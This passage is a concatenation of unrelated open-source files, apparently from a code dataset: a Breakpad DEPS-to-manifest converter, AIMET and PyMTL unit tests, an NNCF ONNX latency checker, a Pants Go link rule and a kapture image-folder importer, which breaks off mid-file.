# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Convert gclient's DEPS file to repo's manifest xml file."""
from __future__ import print_function
import argparse
import os
import sys
REMOTES = {
'chromium': 'https://chromium.googlesource.com/',
'github': 'https://github.com/',
}
REVIEWS = {
'chromium': 'https://chromium-review.googlesource.com',
}
MANIFEST_HEAD = """<?xml version='1.0' encoding='UTF-8'?>
<!-- AUTOGENERATED BY %(prog)s; DO NOT EDIT -->
<manifest>
<default revision='refs/heads/master'
remote='chromium'
sync-c='true'
sync-j='8' />
"""
MANIFEST_REMOTE = """
<remote name='%(name)s'
fetch='%(fetch)s'
review='%(review)s' />
"""
MANIFEST_PROJECT = """
<project path='%(path)s'
name='%(name)s'
revision='%(revision)s'
remote='%(remote)s' />
"""
MANIFEST_TAIL = """
</manifest>
"""
def ConvertDepsToManifest(deps, manifest):
"""Convert the |deps| file to the |manifest|."""
# Load the DEPS file data.
ctx = {}
execfile(deps, ctx)
new_contents = ''
# Write out the common header.
data = {
'prog': os.path.basename(__file__),
}
new_contents += MANIFEST_HEAD % data
# Write out the <remote> sections.
for name, fetch in REMOTES.items():
data = {
'name': name,
'fetch': fetch,
'review': REVIEWS.get(name, ''),
}
new_contents += MANIFEST_REMOTE % data
# Write out the main repo itself.
data = {
'path': 'src',
'name': 'breakpad/breakpad',
'revision': 'refs/heads/master',
'remote': 'chromium',
}
new_contents += MANIFEST_PROJECT % data
# Write out the <project> sections.
for path, url in ctx['deps'].items():
for name, fetch in REMOTES.items():
if url.startswith(fetch):
remote = name
break
else:
raise ValueError('Unknown DEPS remote: %s: %s' % (path, url))
# The DEPS url will look like:
# https://chromium.googlesource.com/external/gyp/@e8ab0833a42691cd2
remote_path, rev = url.split('@')
remote_path = remote_path[len(fetch):]
# If it's not a revision, assume it's a tag. Repo wants full ref names.
if len(rev) != 40:
rev = 'refs/tags/%s' % rev
data = {
'path': path,
'name': remote_path,
'revision': rev,
'remote': remote,
}
new_contents += MANIFEST_PROJECT % data
# Write out the common footer.
new_contents += MANIFEST_TAIL
# See if the manifest has actually changed contents to avoid thrashing.
try:
old_contents = open(manifest).read()
except IOError:
# In case the file doesn't exist yet.
old_contents = ''
if old_contents != new_contents:
print('Updating %s due to changed %s' % (manifest, deps))
with open(manifest, 'w') as fp:
fp.write(new_contents)
def GetParser():
"""Return a CLI parser."""
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('deps',
help='The DEPS file to convert')
parser.add_argument('manifest',
help='The manifest xml to generate')
return parser
def main(argv):
"""The main func!"""
parser = GetParser()
opts = parser.parse_args(argv)
ConvertDepsToManifest(opts.deps, opts.manifest)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
TrainingExtensions/torch/test/python/test_comp_ratio_select.py | quic-tsinghal/aimet | 945 | 12685541 | # /usr/bin/env python3.5
# -*- mode: python -*-
# =============================================================================
# @@-COPYRIGHT-START-@@
#
# Copyright (c) 2017-2018, Qualcomm Innovation Center, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# @@-COPYRIGHT-END-@@
# =============================================================================
import unittest
import unittest.mock
from unittest.mock import create_autospec
from decimal import Decimal
import math
import os
import signal
from torch import nn
import torch.nn.functional as functional
import libpymo as pymo
from aimet_common.defs import CostMetric, LayerCompRatioPair
from aimet_common.cost_calculator import SpatialSvdCostCalculator,WeightSvdCostCalculator
from aimet_common import comp_ratio_select
from aimet_common.bokeh_plots import BokehServerSession
from aimet_common.bokeh_plots import DataTable
from aimet_common.bokeh_plots import ProgressBar
from aimet_common.utils import start_bokeh_server_session
from aimet_torch.utils import create_rand_tensors_given_shapes
from aimet_torch.examples import mnist_torch_model
from aimet_torch.layer_database import Layer, LayerDatabase
from aimet_torch.svd.svd_pruner import SpatialSvdPruner
from aimet_torch import pymo_utils
class MnistModel(nn.Module):
def __init__(self):
super(MnistModel, self).__init__()
self.conv1 = nn.Conv2d(1, 32, kernel_size=5, padding=(2, 2))
self.conv2 = nn.Conv2d(32, 64, kernel_size=5, padding=(2, 2))
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(7*7*64, 1024)
self.fc2 = nn.Linear(1024, 10)
def forward(self, x):
x = functional.relu(functional.max_pool2d(self.conv1(x), 2))
x = functional.relu(functional.max_pool2d(self.conv2_drop(self.conv2(x)), 2))
x = x.view(-1, x.size(1) * x.size(2) * x.size(3))
x = functional.relu(self.fc1(x))
x = functional.dropout(x, training=self.training)
x = self.fc2(x)
return functional.log_softmax(x, dim=1)
class TestTrainingExtensionsCompRatioSelect(unittest.TestCase):
def test_per_layer_eval_scores(self):
url, process = start_bokeh_server_session(8006)
bokeh_session = BokehServerSession(url=url, session_id="compression")
pruner = unittest.mock.MagicMock()
eval_func = unittest.mock.MagicMock()
model = mnist_torch_model.Net().to('cpu')
input_shape = (1, 1, 28, 28)
dummy_input = create_rand_tensors_given_shapes(input_shape)
layer_db = LayerDatabase(model, dummy_input)
layer1 = layer_db.find_layer_by_name('conv1')
layer_db.mark_picked_layers([layer1])
eval_func.side_effect = [90, 80, 70, 60, 50, 40, 30, 20, 10]
# Instantiate child
greedy_algo = comp_ratio_select.GreedyCompRatioSelectAlgo(layer_db, pruner, SpatialSvdCostCalculator(),
eval_func, 20, CostMetric.mac, 0.5, 10, True, None,
None, False, bokeh_session=None)
progress_bar = ProgressBar(1, "eval scores", "green", bokeh_session=bokeh_session)
data_table = DataTable(num_columns=3, num_rows=1,
column_names=['0.1', '0.2', '0.3', '0.4', '0.5', '0.6', '0.7', '0.8', '0.9'],
row_index_names= [layer1.name], bokeh_session=bokeh_session)
pruner.prune_model.return_value = layer_db
eval_dict = greedy_algo._compute_layerwise_eval_score_per_comp_ratio_candidate(data_table, progress_bar, layer1)
self.assertEqual(90, eval_dict[Decimal('0.1')])
bokeh_session.server_session.close("test complete")
os.killpg(os.getpgid(process.pid), signal.SIGTERM)
def test_eval_scores(self):
pruner = unittest.mock.MagicMock()
eval_func = unittest.mock.MagicMock()
eval_func.side_effect = [90, 80, 70, 60, 50, 40, 30, 20, 10,
91, 81, 71, 61, 51, 41, 31, 21, 11]
model = mnist_torch_model.Net().to('cpu')
input_shape = (1, 1, 28, 28)
dummy_input = create_rand_tensors_given_shapes(input_shape)
layer_db = LayerDatabase(model, dummy_input)
layer1 = layer_db.find_layer_by_name('conv1')
layer2 = layer_db.find_layer_by_name('conv2')
layer_db.mark_picked_layers([layer1, layer2])
# Instantiate child
greedy_algo = comp_ratio_select.GreedyCompRatioSelectAlgo(layer_db, pruner, SpatialSvdCostCalculator(),
eval_func, 20, CostMetric.mac, 0.5, 10, True, None,
None, False, bokeh_session=None)
eval_dict = greedy_algo._compute_eval_scores_for_all_comp_ratio_candidates()
self.assertEqual(50, eval_dict['conv1'][Decimal('0.5')])
self.assertEqual(60, eval_dict['conv1'][Decimal('0.4')])
self.assertEqual(11, eval_dict['conv2'][Decimal('0.9')])
def test_eval_scores_with_spatial_svd_pruner(self):
pruner = SpatialSvdPruner()
eval_func = unittest.mock.MagicMock()
eval_func.side_effect = [90, 80, 70, 60, 50, 40, 30, 20, 10,
91, 81, 71, 61, 51, 41, 31, 21, 11]
model = mnist_torch_model.Net()
# Create a layer database
input_shape = (1, 1, 28, 28)
dummy_input = create_rand_tensors_given_shapes(input_shape)
layer_db = LayerDatabase(model, dummy_input)
layer1 = layer_db.find_layer_by_name('conv1')
layer2 = layer_db.find_layer_by_name('conv2')
layer_db.mark_picked_layers([layer1, layer2])
# Instantiate child
greedy_algo = comp_ratio_select.GreedyCompRatioSelectAlgo(layer_db, pruner, SpatialSvdCostCalculator(),
eval_func, 20, CostMetric.mac, 0.5, 10, True, None,
None, True, bokeh_session=None)
eval_dict = greedy_algo._compute_eval_scores_for_all_comp_ratio_candidates()
print()
print(eval_dict)
self.assertEqual(90, eval_dict['conv1'][Decimal('0.1')])
self.assertEqual(51, eval_dict['conv2'][Decimal('0.5')])
self.assertEqual(21, eval_dict['conv2'][Decimal('0.8')])
def test_find_min_max_eval_scores(self):
eval_scores_dict = {'layer1': {Decimal('0.1'): 90, Decimal('0.5'): 50, Decimal('0.7'): 30, Decimal('0.8'): 20},
'layer2': {Decimal('0.2'): 91, Decimal('0.3'): 45, Decimal('0.7'): 30, Decimal('0.9'): 11}}
min_score, max_score = comp_ratio_select.GreedyCompRatioSelectAlgo._find_min_max_eval_scores(eval_scores_dict)
self.assertEqual(11, min_score)
self.assertEqual(91, max_score)
eval_scores_dict = {'layer1': {Decimal('0.1'): 10, Decimal('0.5'): 92, Decimal('0.7'): 30, Decimal('0.8'): 20},
'layer2': {Decimal('0.2'): 91, Decimal('0.3'): 45, Decimal('0.7'): 30, Decimal('0.9'): 11}}
min_score, max_score = comp_ratio_select.GreedyCompRatioSelectAlgo._find_min_max_eval_scores(eval_scores_dict)
self.assertEqual(10, min_score)
self.assertEqual(92, max_score)
def test_find_layer_comp_ratio_given_eval_score(self):
eval_scores_dict = {'layer1': {Decimal('0.1'): 90, Decimal('0.5'): 50, Decimal('0.7'): 30, Decimal('0.8'): 20},
'layer2': {Decimal('0.1'): 11,
Decimal('0.3'): 23,
Decimal('0.5'): 47,
Decimal('0.7'): 85,
Decimal('0.9'): 89}
}
layer2 = Layer(nn.Conv2d(32, 64, 3), "layer2", None)
greedy_algo = comp_ratio_select.GreedyCompRatioSelectAlgo
comp_ratio = greedy_algo._find_layer_comp_ratio_given_eval_score(eval_scores_dict,
45,
layer2)
self.assertEqual(Decimal('0.5'), comp_ratio)
comp_ratio = greedy_algo._find_layer_comp_ratio_given_eval_score(eval_scores_dict,
48,
layer2)
self.assertEqual(Decimal('0.7'), comp_ratio)
comp_ratio = greedy_algo._find_layer_comp_ratio_given_eval_score(eval_scores_dict,
90,
layer2)
self.assertEqual(None, comp_ratio)
def test_select_per_layer_comp_ratios(self):
pruner = unittest.mock.MagicMock()
eval_func = unittest.mock.MagicMock()
rounding_algo = unittest.mock.MagicMock()
rounding_algo.round.side_effect = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9,
0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]
eval_func.side_effect = [10, 20, 30, 40, 50, 60, 70, 80, 90,
11, 21, 31, 35, 40, 45, 50, 55, 60]
model = mnist_torch_model.Net()
input_shape = (1, 1, 28, 28)
dummy_input = create_rand_tensors_given_shapes(input_shape)
layer_db = LayerDatabase(model, dummy_input)
layer1 = layer_db.find_layer_by_name('conv1')
layer2 = layer_db.find_layer_by_name('conv2')
selected_layers = [layer1, layer2]
layer_db.mark_picked_layers([layer1, layer2])
try:
os.remove('./data/greedy_selection_eval_scores_dict.pkl')
except OSError:
pass
# Instantiate child
greedy_algo = comp_ratio_select.GreedyCompRatioSelectAlgo(layer_db, pruner, SpatialSvdCostCalculator(),
eval_func, 20, CostMetric.mac, Decimal(0.6), 10, True,
None, rounding_algo, False, bokeh_session=None)
layer_comp_ratio_list, stats = greedy_algo.select_per_layer_comp_ratios()
original_cost = SpatialSvdCostCalculator.compute_model_cost(layer_db)
for layer in layer_db:
if layer not in selected_layers:
layer_comp_ratio_list.append(LayerCompRatioPair(layer, None))
compressed_cost = SpatialSvdCostCalculator.calculate_compressed_cost(layer_db, layer_comp_ratio_list,
CostMetric.mac)
rounding_algo.round.side_effect = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9,
0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]
actual_compression_ratio = compressed_cost.mac / original_cost.mac
self.assertTrue(math.isclose(Decimal(0.6), actual_compression_ratio, abs_tol=0.05))
self.assertTrue(os.path.isfile('./data/greedy_selection_eval_scores_dict.pkl'))
print('\n')
for pair in layer_comp_ratio_list:
print(pair)
# lets repeat with a saved eval_dict
greedy_algo = comp_ratio_select.GreedyCompRatioSelectAlgo(layer_db, pruner, SpatialSvdCostCalculator(),
eval_func, 20, CostMetric.mac, Decimal(0.6), 10, True,
'./data/greedy_selection_eval_scores_dict.pkl',
rounding_algo, False, bokeh_session=None)
layer_comp_ratio_list, stats = greedy_algo.select_per_layer_comp_ratios()
original_cost = SpatialSvdCostCalculator.compute_model_cost(layer_db)
for layer in layer_db:
if layer not in selected_layers:
layer_comp_ratio_list.append(LayerCompRatioPair(layer, None))
compressed_cost = SpatialSvdCostCalculator.calculate_compressed_cost(layer_db, layer_comp_ratio_list,
CostMetric.mac)
actual_compression_ratio = compressed_cost.mac / original_cost.mac
self.assertTrue(math.isclose(Decimal(0.6), actual_compression_ratio, abs_tol=0.05))
print('\n')
for pair in layer_comp_ratio_list:
print(pair)
def test_select_per_layer_comp_ratios_with_spatial_svd_pruner(self):
pruner = SpatialSvdPruner()
eval_func = unittest.mock.MagicMock()
rounding_algo = unittest.mock.MagicMock()
eval_func.side_effect = [10, 20, 30, 40, 50, 60, 70, 80, 90,
11, 21, 31, 35, 40, 45, 50, 55, 60]
rounding_algo.round.side_effect = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9,
0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]
model = mnist_torch_model.Net()
input_shape = (1, 1, 28, 28)
dummy_input = create_rand_tensors_given_shapes(input_shape)
layer_db = LayerDatabase(model, dummy_input)
selected_layers = [layer for layer in layer_db if isinstance(layer.module, nn.Conv2d)]
layer_db.mark_picked_layers(selected_layers)
# Instantiate child
greedy_algo = comp_ratio_select.GreedyCompRatioSelectAlgo(layer_db, pruner, SpatialSvdCostCalculator(),
eval_func, 20, CostMetric.mac, Decimal(0.4), 10, True,
None, rounding_algo, False, bokeh_session=None)
layer_comp_ratio_list, stats = greedy_algo.select_per_layer_comp_ratios()
original_cost = SpatialSvdCostCalculator.compute_model_cost(layer_db)
for layer in layer_db:
if layer not in selected_layers:
layer_comp_ratio_list.append(LayerCompRatioPair(layer, None))
compressed_cost = SpatialSvdCostCalculator.calculate_compressed_cost(layer_db, layer_comp_ratio_list,
CostMetric.mac)
actual_compression_ratio = compressed_cost.mac / original_cost.mac
self.assertTrue(math.isclose(Decimal(0.3), actual_compression_ratio, abs_tol=0.8))
print('\n')
for pair in layer_comp_ratio_list:
print(pair)
def test_comp_ratio_select_tar(self):
compute_model_cost = unittest.mock.MagicMock()
pruner = unittest.mock.MagicMock()
eval_func = unittest.mock.MagicMock()
eval_func.side_effect = [0.1,0.15,0.2,0.25,0.3,0.35,0.4,0.45,0.5,0.55,0.6,0.65,0.7,0.75,0.8,0.85,0.9,0.95,0.97,1.0,
0.1,0.15,0.2,0.25,0.3,0.35,0.4,0.45,0.5,0.55,0.6,0.65,0.7,0.75,0.8,0.85,0.9,0.95,0.97,1.0,
0.1,0.15,0.2,0.25,0.3,0.35,0.4,0.45,0.5,0.55,0.6,0.65,0.7,0.75,0.8,0.85,0.9,0.95,0.97,1.0,
0.1,0.15,0.2,0.25,0.3,0.35,0.4,0.45,0.5,0.55,0.6,0.65,0.7,0.75,0.8,0.85,0.9,0.95,0.97,1.0]
compute_model_cost.return_value = (500,500)
compute_network_cost = unittest.mock.MagicMock()
compute_network_cost.return_value = (500,500)
model = mnist_torch_model.Net().to('cpu')
input_shape = (1, 1, 28, 28)
dummy_input = create_rand_tensors_given_shapes(input_shape)
layer_db = LayerDatabase(model, dummy_input)
layer1 = layer_db.find_layer_by_name('conv2')
layer_db.mark_picked_layers([layer1])
layer2 = layer_db.find_layer_by_name('fc2')
layer_db.mark_picked_layers([layer2])
layer3 = layer_db.find_layer_by_name('fc1')
layer_db.mark_picked_layers([layer3])
# Instantiate child
tar_algo = comp_ratio_select.TarRankSelectAlgo(layer_db=layer_db, pruner=pruner,
cost_calculator=WeightSvdCostCalculator(),
eval_func=eval_func, eval_iterations=20,
cost_metric=CostMetric.mac, num_rank_indices=20,
use_cuda=False, pymo_utils_lib=pymo_utils)
tar_algo._svd_lib_ref = create_autospec(pymo.Svd, instance=True)
tar_algo._svd_lib_ref.SetCandidateRanks = unittest.mock.MagicMock()
tar_algo._svd_lib_ref.SetCandidateRanks.return_value = 20
tar_algo._num_rank_indices = 20
with unittest.mock.patch('aimet_common.cost_calculator.CostCalculator.calculate_comp_ratio_given_rank') as calculate_comp_ratio_given_rank:
calculate_comp_ratio_given_rank.side_effect = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0,
0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0,
0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]
layer_comp_ratio_list, stats = tar_algo.select_per_layer_comp_ratios()
self.assertEqual(layer_comp_ratio_list[2].eval_score, 0.97)
self.assertEqual(layer_comp_ratio_list[2].comp_ratio, 1.0)
|
examples/experimental/onnx/performance_checker.py | openvinotoolkit/nncf_pytorch | 136 | 12685547 | """
Copyright (c) 2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
from typing import List
from typing import Optional
import numpy as np
import onnx
from tqdm import tqdm
from nncf.common.utils.logger import logger as nncf_logger
from openvino.tools.accuracy_checker.config import ConfigReader
from openvino.tools.accuracy_checker.argparser import build_arguments_parser
from openvino.tools.accuracy_checker.dataset import Dataset
from openvino.tools.accuracy_checker.evaluators import ModelEvaluator
import nncf.experimental.post_training.api.dataset as ptq_api_dataset
from nncf.experimental.onnx.engine import ONNXEngine
from nncf.experimental.onnx.samplers import create_onnx_sampler
from time import time
import pandas as pd
class OpenVINOAccuracyCheckerDataset(ptq_api_dataset.Dataset):
def __init__(self, evaluator: ModelEvaluator, batch_size, shuffle):
super().__init__(batch_size, shuffle)
self.model_evaluator = evaluator
def __getitem__(self, item):
_, batch_annotation, batch_input, _ = self.model_evaluator.dataset[item]
filled_inputs, _, _ = self.model_evaluator._get_batch_input(
batch_annotation, batch_input)
assert len(filled_inputs) == 1
dummy_target = 0
for _, v in filled_inputs[0].items():
return np.squeeze(v, axis=0), dummy_target
raise RuntimeError("filled_inputs has no value.")
def __len__(self):
return len(self.model_evaluator.dataset)
def run(onnx_model_path: str, output_file_path: str, dataset: Dataset,
ignored_scopes: Optional[List[str]] = None, evaluate: Optional[bool] = False):
num_init_samples = len(dataset)
nncf_logger.info("Post-Training Quantization Parameters:")
nncf_logger.info(f" number of samples: {num_init_samples}")
nncf_logger.info(f" ignored_scopes: {ignored_scopes}")
onnx.checker.check_model(onnx_model_path)
original_model = onnx.load(onnx_model_path)
nncf_logger.info(f"The model is loaded from {onnx_model_path}")
onnx.checker.check_model(original_model)
engine = ONNXEngine()
sampler = create_onnx_sampler(dataset, range(len(dataset)))
engine.rt_session_options['providers'] = ["OpenVINOExecutionProvider"]
engine.set_model(original_model)
engine.set_sampler(sampler)
elapsed_times = []
for input_data, _ in tqdm(sampler):
start_time = time()
engine.infer(input_data)
elapsed_times += [1000.0 * (time() - start_time)]
elapsed_times = np.array(elapsed_times)
model_name, _ = os.path.splitext(os.path.basename(onnx_model_path))
df = pd.DataFrame({
"model_name": [model_name],
"latency_mean": [np.mean(elapsed_times)],
"latency_std": [np.std(elapsed_times)]
})
if os.path.exists(output_file_path):
df.to_csv(output_file_path, header=False, mode="a", index=False)
else:
df.to_csv(output_file_path, header=True, mode="w", index=False)
if __name__ == '__main__':
parser = build_arguments_parser()
parser.add_argument("--output-file-path", "-o",
help="Directory path to save output quantized ONNX model", type=str)
args = parser.parse_args()
config, mode = ConfigReader.merge(args)
assert mode == "models"
for config_entry in config[mode]:
model_evaluator = ModelEvaluator.from_configs(config_entry)
assert "datasets" in config_entry
assert len(config_entry["datasets"]
) == 1, "Config should have one dataset."
dataset_config = config_entry["datasets"][0]
assert "launchers" in config_entry
assert len(config_entry["launchers"]) == 1
run(onnx_model_path=str(config_entry["launchers"][0]["model"]),
output_file_path=args.output_file_path,
dataset=OpenVINOAccuracyCheckerDataset(model_evaluator, batch_size=1, shuffle=True))
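# Illustrative invocation sketch (not part of the original script; the config
# file name is a hypothetical placeholder). Apart from -o/--output-file-path,
# all flags come from openvino.tools.accuracy_checker's build_arguments_parser,
# assuming its usual -c/--config option:
#
#     python performance_checker.py -c accuracy_checker_config.yml -o latencies.csv
#
# Each run appends one row (model_name, latency_mean, latency_std) to the CSV.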
|
src/python/pants/backend/go/util_rules/link.py | yoav-orca/pants | 1806 | 12685549 | # Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from dataclasses import dataclass
from pants.backend.go.util_rules.sdk import GoSdkProcess
from pants.engine.fs import Digest
from pants.engine.process import ProcessResult
from pants.engine.rules import Get, collect_rules, rule
@dataclass(frozen=True)
class LinkGoBinaryRequest:
"""Link a Go binary from package archives and an import configuration."""
input_digest: Digest
archives: tuple[str, ...]
import_config_path: str
output_filename: str
description: str
@dataclass(frozen=True)
class LinkedGoBinary:
"""A linked Go binary stored in a `Digest`."""
digest: Digest
@rule
async def link_go_binary(request: LinkGoBinaryRequest) -> LinkedGoBinary:
result = await Get(
ProcessResult,
GoSdkProcess(
input_digest=request.input_digest,
command=(
"tool",
"link",
"-importcfg",
request.import_config_path,
"-o",
request.output_filename,
"-buildmode=exe", # seen in `go build -x` output
*request.archives,
),
description=f"Link Go binary: {request.output_filename}",
output_files=(request.output_filename,),
),
)
return LinkedGoBinary(result.output_digest)
def rules():
return collect_rules()
|
pclib/test/TestSimpleSink_test.py | belang/pymtl | 206 | 12685561 | #=========================================================================
# TestSimpleSink_test.py
#=========================================================================
from __future__ import print_function
from pymtl import *
from TestSimpleSource import TestSimpleSource
from TestSimpleSink import TestSimpleSink
#-------------------------------------------------------------------------
# TestHarness
#-------------------------------------------------------------------------
class TestHarness( Model ):
def __init__( s, dtype, msgs ):
# Instantiate models
s.src = TestSimpleSource ( dtype, msgs )
s.sink = TestSimpleSink ( dtype, msgs )
# Connect chain
s.connect( s.src.out.msg, s.sink.in_.msg )
s.connect( s.src.out.val, s.sink.in_.val )
s.connect( s.src.out.rdy, s.sink.in_.rdy )
def done( s ):
return s.src.done and s.sink.done
def line_trace( s ):
return s.src.line_trace() + " | " + s.sink.line_trace()
#-------------------------------------------------------------------------
# test_basics
#-------------------------------------------------------------------------
def test_basics( dump_vcd ):
# Test messages
test_msgs = [
0x0000,
0x0a0a,
0x0b0b,
0x0c0c,
0x0d0d,
0xf0f0,
0xe0e0,
0xd0d0,
]
# Instantiate and elaborate the model
model = TestHarness( 16, test_msgs )
model.vcd_file = dump_vcd
model.elaborate()
# Create a simulator using the simulation tool
sim = SimulationTool( model )
# Run the simulation
print()
sim.reset()
while not model.done():
sim.print_line_trace()
sim.cycle()
# Add a couple extra ticks so that the VCD dump is nicer
sim.cycle()
sim.cycle()
sim.cycle()
|
tools/kapture_import_image_folder.py | v-mehta/kapture | 264 | 12685592 | #!/usr/bin/env python3
# Copyright 2020-present NAVER Corp. Under BSD 3-clause license
"""
This script imports images from a folder in the kapture format
"""
import argparse
import logging
import os
import os.path as path
import PIL
from PIL import Image
# kapture
import path_to_kapture # noqa: F401
import kapture
import kapture.utils.logging
from kapture.io.structure import delete_existing_kapture_files
from kapture.io.csv import kapture_to_dir, sensors_from_file
from kapture.utils.paths import path_secure
from kapture.io.records import TransferAction, import_record_data_from_dir_auto
logger = logging.getLogger('image_folder')
def import_image_folder(
images_path: str,
kapture_path: str,
force_overwrite_existing: bool = False,
images_import_method: TransferAction = TransferAction.skip
) -> None:
"""
Imports the images of a folder to a kapture. This creates only images and cameras.
:param images_path: path to directory containing the images.
:param kapture_path: path to kapture root directory.
:param force_overwrite_existing: Silently overwrite kapture files if already exists.
:param images_import_method: choose how to import actual image files.
"""
os.makedirs(kapture_path, exist_ok=True)
delete_existing_kapture_files(kapture_path, force_erase=force_overwrite_existing)
images = kapture.RecordsCamera()
file_list = [path.relpath(path.join(dirpath, filename), images_path)
for dirpath, dirs, filenames in os.walk(images_path)
for filename in filenames]
file_list = sorted(file_list)
try:
sensors_filepath = path.join(images_path, 'sensors.txt')
sensors = sensors_from_file(sensors_filepath)
sensors_given = True
except OSError:
logger.info('image folder has no extra sensor info')
sensors = kapture.Sensors()
sensors_given = False
logger.info('starting conversion...')
for n, filename in enumerate(file_list):
# test if file is a valid image
try:
# lazy load
with Image.open(path.join(images_path, filename)) as im:
width, height = im.size
model_params = [width, height]
except (OSError, PIL.UnidentifiedImageError):
# It is not a valid image: skip it
logger.info(f'Skipping invalid image file {filename}')
continue
if sensors_given:
if len(sensors) == 1:
# in case of single camera, just take the name from sensors.txt
camera_id = list(sensors.keys())[0]
else:
# guess sensor_id from dirname
camera_id = path.dirname(path.join(images_path, filename)).split(os.sep)[-1]
if camera_id not in sensors:
logger.critical(f'camera {camera_id} is not found in sensors.txt')
raise KeyError(f'camera {camera_id} is not found in sensors.txt')
else:
camera_id = f'sensor{n}'
sensors[camera_id] = kapture.Camera(kapture.CameraType.UNKNOWN_CAMERA, model_params)
images[(n, camera_id)] = path_secure(filename) # don't forget windows
# import (copy) image files.
logger.info('import image files ...')
filename_list = [f for _, _, f in kapture.flatten(images)]
import_record_data_from_dir_auto(images_path, kapture_path, filename_list, images_import_method)
# pack into kapture format
imported_kapture = kapture.Kapture(sensors=sensors, records_camera=images)
logger.info('writing imported data...')
kapture_to_dir(kapture_path, imported_kapture)
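# Minimal usage sketch (not part of the original module); the paths below are
# hypothetical placeholders and TransferAction.copy is just one of the
# available transfer modes.
#
#     import_image_folder(
#         images_path='/data/my_images',
#         kapture_path='/data/my_images_kapture',
#         force_overwrite_existing=True,
#         images_import_method=TransferAction.copy)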
def import_image_folder_command_line() -> None:
"""
Do the image list import to kapture using the parameters given on the command line.
"""
parser = argparse.ArgumentParser(description='imports images from a folder in the kapture format')
parser_verbosity = parser.add_mutually_exclusive_group()
parser_verbosity.add_argument(
'-v', '--verbose', nargs='?', default=logging.WARNING, const=logging.INFO,
action=kapture.utils.logging.VerbosityParser,
help='verbosity level (debug, info, warning, critical, ... or int value) [warning]')
parser_verbosity.add_argument(
'-q', '--silent', '--quiet', action='store_const', dest='verbose', const=logging.CRITICAL)
parser.add_argument('-f', '-y', '--force', action='store_true', default=False,
help='Force delete output if already exists.')
# import ###########################################################################################################
parser.add_argument('-i', '--input', required=True, help='input path to images root folder')
parser.add_argument('-o', '--output', required=True, help='output directory')
parser.add_argument('--image_transfer', type=TransferAction, default=TransferAction.link_absolute,
